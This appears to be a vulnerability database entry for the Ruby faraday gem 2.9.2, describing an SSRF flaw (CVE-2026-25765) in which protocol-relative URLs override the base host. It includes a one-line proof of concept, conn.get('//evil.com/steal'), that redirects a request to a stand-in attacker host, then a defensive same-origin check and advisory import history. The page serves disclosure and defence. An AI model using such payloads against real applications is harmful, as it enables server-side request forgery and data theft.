| purl | pkg:gem/faraday@2.9.2 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
| VCID-ycrm-uaf6-73a7 (Aliases: CVE-2026-25765, GHSA-33mh-2634-fwr2) | Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url | |

Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are network-path references that override the base URL's host/authority component. This means that if any application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely.

**Example:**

```ruby
require 'faraday'

# The base URL is https://api.internal.com, but the protocol-relative path
# replaces the host during URI#merge, so the request is sent to evil.com.
conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
```

Affected by 2 other vulnerabilities.
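To see the `URI#merge` resolution behaviour the advisory describes, and one application-side check that catches it before a path reaches the HTTP client, here is an added example using only Ruby's standard `uri` library (not Faraday's own code); `resolve_path` and `same_origin_path?` are hypothetical helpers and `external.example` is a constructed placeholder host:

```ruby
require 'uri'

# Resolve a request path against a base URL the same way the advisory says
# build_exclusive_url does: via URI#merge (RFC 3986 reference resolution).
def resolve_path(base_url, path)
  URI(base_url).merge(path)
end

# Hypothetical application-side guard (not part of Faraday): resolve the
# path first, then accept it only if scheme, host and port still match the
# base URL. Network-path references ("//host/...") and absolute URLs to
# other hosts both fail this check; ordinary paths such as "/v1/users" pass.
def same_origin_path?(base_url, path)
  base = URI(base_url)
  resolved = base.merge(path)
  resolved.scheme == base.scheme &&
    resolved.host == base.host &&
    resolved.port == base.port
end

if $PROGRAM_NAME == __FILE__
  base = 'https://api.internal.com'
  ['/v1/users', '//external.example/endpoint', 'https://other.example/x'].each do |p|
    puts format('%-30s -> %-42s same origin: %s',
                p, resolve_path(base, p), same_origin_path?(base, p))
  end
end
```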
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | | |
| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|---|---|---|---|---|---|
| 2026-06-06T06:51:06.560184+00:00 | GitLab Importer | Affected by | VCID-ycrm-uaf6-73a7 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/gem/faraday/CVE-2026-25765.yml | 38.6.0 |
| 2026-06-04T18:16:00.936313+00:00 | Ruby Importer | Affected by | VCID-ycrm-uaf6-73a7 | https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-25765.yml | 38.6.0 |